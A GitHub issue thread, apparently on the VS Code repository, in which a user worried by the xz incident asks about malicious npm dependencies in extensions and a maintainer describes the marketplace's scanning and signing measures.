isidorn
commented
3 months ago Thanks for opening this issue. And let me first say that it is possible to leak code or mine bitcoin from an extension. And that is the reason why our VS Marketplace invests a lot into security. Similar like npm, we have a lot of automated and manual scanning techniques in place. We are also investing into publisher and repository signing to increase the trust in our extension ecosystem coming from the VS marketplace. Having said that, we understand that however many safety nets we put in place we will never be perfect. And that is why we are always adding more security layers and continuing to invest in this area.
Also we do not plan to include all extensions as part of VS Code, as that would defeat the purpose of a minimalistic text editor, and it would simply not scale.
For now I can leave this issue open for more feedback. Thank you
Hi, i know this is a duplicate of #9899 but after a recent incident with xz got curious about possible security problems with the extensions and their use of npm packages with stuff like 'package depends on package that depends on package with code sender to unknown domain'. If plugins can unintentionally use malware packages then maybe it would be better to start porting plugins like todo highlight right into vscode? Because, you know, they're kinda very useful. Don't know any details about vscode's security for such problems, but if its guaranteed that its not possible to leak code or mine bitcoin then close it whatever